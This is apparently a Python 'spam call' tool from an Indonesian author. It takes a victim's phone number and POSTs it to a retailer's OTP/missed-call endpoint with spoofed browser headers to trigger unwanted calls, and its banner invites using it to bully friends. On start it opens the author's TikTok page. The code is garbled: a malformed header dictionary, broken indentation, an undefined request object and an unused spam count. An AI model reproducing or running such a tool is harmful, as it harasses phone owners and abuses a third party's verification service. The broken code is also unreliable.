#cybers 2024 
#btw udah folloe tiktok chanel gwa belum heheheh
#izin dulu ya kalo mau record 
#no hp 08999859595
import os,sys,requests,time,json,random
logo="""
 	   kandura-warning     \33[0;32mV.5
  \33[0;31m
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXWMMMMWNNNNNNN0OxddxxdddkOOOKNNWWNXXNNWMMWMMMMWNXkXWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXMMNNNNNNNNXKkOOOOOOOOOkkkkkKWNK0kO0KXNWMMMMWNXK0WWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWKNNNKXWWXXNKkOOOOOO0OkkkxxxxkNWMXkkkOO0XNWMMWNXKKWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWNK0OKWKxxkNXNN0OOkkkkkOO0xkkkkxd0WWWM0xdkkO0KXNMMWNKkNWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWNXXKK0NNOxxxxkWWKXNKkkkkkkO0kkkxxxxkNWMMWkxdxkO00NNMMWXox0NWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWXXWWWNX0NkxxxxxONXXXMW0OkkkOO0Okkkkx0XK0XNOxxxxxxk00NXMM0dkkkKWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWKMMMWW0WOkkkkxxkOXKNMMMNXKNW00OOOXNNNMWNxkxxxxxxxkk0KXNNdkkkOOKWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWXMMMKNXkkkkkkkxkOOKWMMMMWMWNKk0OWMMMXXKxxxxxxkxxxkk000ddkkO0XW0WWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWXWMOW0OOOOkkxk0O0kOWMMMMMMNNkk00WMNOkkxxxxxxkkxxkkk0xdkOO0NWWKWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWNOXXK0OOOOOxO0xKkOKWWWWNWNWOkkKKKOkkkkxdkkkkkxkxkkOdoOOKNWMKNWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWkNNX000OOdOKkdKkOOOOO0OKXWKOxkKOOOOkkkdxkkkkxkxOkkdokXWWMKNWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWkNNX0XK0xdKk0O0xkOOOOOOdxXXONxkK0000OkxxOOOOkkkkOxdo0MMMXNWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWkMNKXXKOok0KWWOOokO0000xl0XOWNxdKKKKKddx0000OkOkOxdo0MMNXWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWNNMNKNN0dd00WMMKKdxO0KKKOldK00K0koOXXXxodK0000k0k0ddo0MNXWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWKMMNKXXOldxKKKKKOOk0O0XXXxckXXWMMKdd0XkooK0000k0kkddd0NKWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWW0MMNKXXkcdXWMMMMW0kOWK0XNXodOXWMWWW0dkOxlK0O00k0kdddo0dNWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWW0NMNKXXxl0WMWWWWWWXOXMWKKXXkOk000OOO0xddoK0O0OOOddxxlox0WWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWKKMWKXXkxWW0xdkk00XWXXWMMNNN0Kxkl,''...':dOO0k0Ox00K0ddxWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWK0WW0XX0do,';.;o:cOWMMWWMMMWN0dlc:'ok'.cl.,xxx0x0OOONxooNWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWXKKWKXX0:,dOd,,:;.:WMMMMMMMMMWXNc,.,,.'ok,lxOOOkOO0XKxod0WWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWN0WKXKXXkoXWXc;:d;:NMMMMMMMMMMMWKlkKKd:kkxxO0OOk0OX0dxodxWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWNXNXXXXKOKNNxoOXKXWWWMMMMMMMMWWWK0KXKKOKkx000OkK0xxdxodkXWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWXWNXNXX0KNNNNNWWWWWWMMMMMMMMWWWWNNNNOXNkkK00xxxxxxdxdxXXWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWNWXNXKO0NNNNWWWWWWMMMNWMMMMWWWWWWWXXNWkKKO0dxxxxxdxxOXXNWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWKXNXkx0WWWWWWWWWMMMWMMMMMWWWWWWNNWWN00k00oxxxxxdxO0KWKWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWKKNN0od0NWWWWWMMMWWMMMMMWWWWWWWWWWNKOx0NxoxxxxxdkKOKWKWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXXKWNOkk0KWMMMMMWWWWWWWWWNWMMMWWXXOdkKN0doxxxxxd0KO0WXNWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWKKXWNOWKKKNWWMMMMMMMMMMMMMMWWNNKKxkXNX0odxxxxxxKKO0XWKWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNKXXWNKWWXKXXWMMMMMMMMMMMMWNXK0k00XXNKkddxxxxxOKK0OXWKWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNKXKNXXWWWWNKK00NWMMMMWXK0O000kXXNWXO0dxxxxxxKKK0OXWXNWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNXKKXWWWWWWNxxkO00OkO0000OO0WWWN0NkdxxxxOkKKK0OWXWKWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXK0XWWWWXk000000000OOOO0kWWNNWXxxxxxOOkKKK0OWXWKWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNX0ONXKKNWk000000000000000xKWWWWOxxxxOOO0KKKO0WXWKWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWNkollcccl:;,kXNNXOk00000000000000KXXNXXNWxxxkOOO0XKKKOKWXWXNWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWk'''''',,::;'XWMMWNNXKK0000000KKXNWMMWWWNKOkxdlokOOK0KOKWKNNXWWWWWWWWWWWWW
NWXWWWWWWWWWWWWWWWWWWWWWWWd..''';;;;;:;,OXWMMMMMMWWWWWWWWWMMMMMMMWWMMWW0;,;:;,;;;;clxXXXWWWWWWWWWWWWW
WWXWWWWWWWWWWWWWWWWWWWWWWd'.'';;;:::::::xWNWWMMMMMMMMMMMMMMMMMMMMMWWWXd:::;;;::::::;,:KNWWWWWWWWWWWWW
WXWWWWWWWWWWWWWWWWWWWWWWx''.,;:;,,;:;;:::XMWWNNWMMMMMMMWNNNNNNNXXXKOl:::;;:;;;;::::,,.:NWWWWWWWWWWWWW
KWWWWWWWWWWWWWWWWWWWWWWO''..';;'',;::;;::cKMMMXNWMMMWNKXWMMMMMWWXOo::;;;::;;,,,;;;;,'.'OWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWK'''..,;'',;::::;;;::dNWWKXMMMMWWWMMMWKOdl::;;:::;;;;,',,;;;;,'''lWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWN,'''..;',;::::::::;;:::dXMWMMMMWX0kdl::;;:;;;::::;,,,'';;;;,,','',WWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWc''''''';::ldc::::;;,,;;;;lddolc:::;;;;;;;;;::::::;;','.;:;,,,,;,''WWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWx'''',,;:::OMMo:::;;;;,,'''':;,,,,''''',,,,;;:::::::;,''.;;,','::,'.XWWWWWWWWWWWW
WNNNNNWWWWWWWWWWWWWo'''',;::::KMMO;::;;;,''''.'dxo.'''',,;;;;;:::;::;;::;;''..'''';::,'.xWWWWWWWWWWWW
WMMWNNXWWWWWWWWWWNc.'',::::::ONMN:::::::::;;;,0NNk;;;;:::::::::xKWMWWNK0ko,...''',:::;'.;WWWWWWWWWWWW
NXNNWWWWWWWWWWWWN:.'.,::::::dXKXl:::;;:::::::dNWMc::::::::::;d0occccodk0XNXo..''';:::;'.'OWWWWWWWWWWW
NWWWWWWWWWWWWWWX;''.';:::::lWMMNkkkxdooooooldXNXO;;;;;:::::;kk::::::::;::;:;...';::::;'.':WWWWWWWWWWW
WWWWWWWWWWWWWWN;''..,::::;;0MMWXXXWWNNNXKXWWWNNX;;;;;::::::ck;::::::::::::::,..';:::::,'''KWWWWWWWWWW
KXXXXXXXXXXXXKl......,;;,,,KX0OKKOXXXKK0xldkOOOd',,,,,,,,,;c,;,,,,,,,,,,,,,,'...',,,;,'...lXXXXXXXXXX
 \33[0;31m┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 \33[0;31m┃\33[0;33m➣ \33[0;36mAUTHOR  : \33[0;35mHOZOO \33[0;31m┃
 \33[0;31m┃\33[0;33m➣ \33[0;32mTIKTOK \33[0;32mHACKERSHOZOORAFI   \33[0;31m┃
 \33[0;31m┃\33[0;33m➣ \33[0;35mGITHUB  : \33[0;38mhozoo    \33[0;31m┃
 \33[0;31m┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
"""
def mengetik(s):
     for i in s + "\n":
        sys.stdout.write(i)
        sys.stdout.flush()
        time.sleep(random.random() *0.0)

os.system("clear")
mengetik("\33[0;34m[+]\33[0;32mFOLLOW TIKTOK  chanel gwa dulu  YA BRO PLIS FOLLOW")
os.system("xdg-open https://www.tiktok.com/@hackershozoorafi?_t=8gml9q28SEU&_r=1")
def main():
 os.system("clear")
 mengetik(logo)
 mengetik("\33[0;35mHOZOO Tidak bartanggung jawab!!\ngunakan dengan bijak BISA MERUSAK PERTEMENAN ANDA NANTI BULLY 😏 ")
 no=input("\33[0;34mNomor Target : ")
 jum=int(input(" \33[0;36mJumlah Spam : "))
 os.system('clear')
print(logo)
target = input(" No Target : ")
api_url = "https://www.nutriclub.co.id/otp/?phone=0"+target+"&old_phone=0"+target
#spam 1
 head1="{Host": "www.nutriclub.co.id",
"content-length": "0","accept":
"application/json, text/javascript, */*; q=0.01",
"x-requested-with": "XMLHttpRequest",
"save-data": "on",
"user-agent": "Mozilla/5.0 (Linux; Android 8.1.0; CPH1853) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36",
"origin": "https://www.nutriclub.co.id",
"sec-fetch-site": "same-origin",
"sec-fetch-mode": "cors",
"sec-fetch-dest": "empty","referer": "https://www.nutriclub.co.id/account/register",
}
respon = rek.post(api_url,headers).text

status = json.loads(respon)["StatusMessage"]
if status == "Request misscall berhasil":
     print("\n {✓} Spam Call / Telepon Untuk No "+ target +" Berhasil \n")
else:
     print("\n {×} Spam sudah dilakukan 3x » Gagal \n")

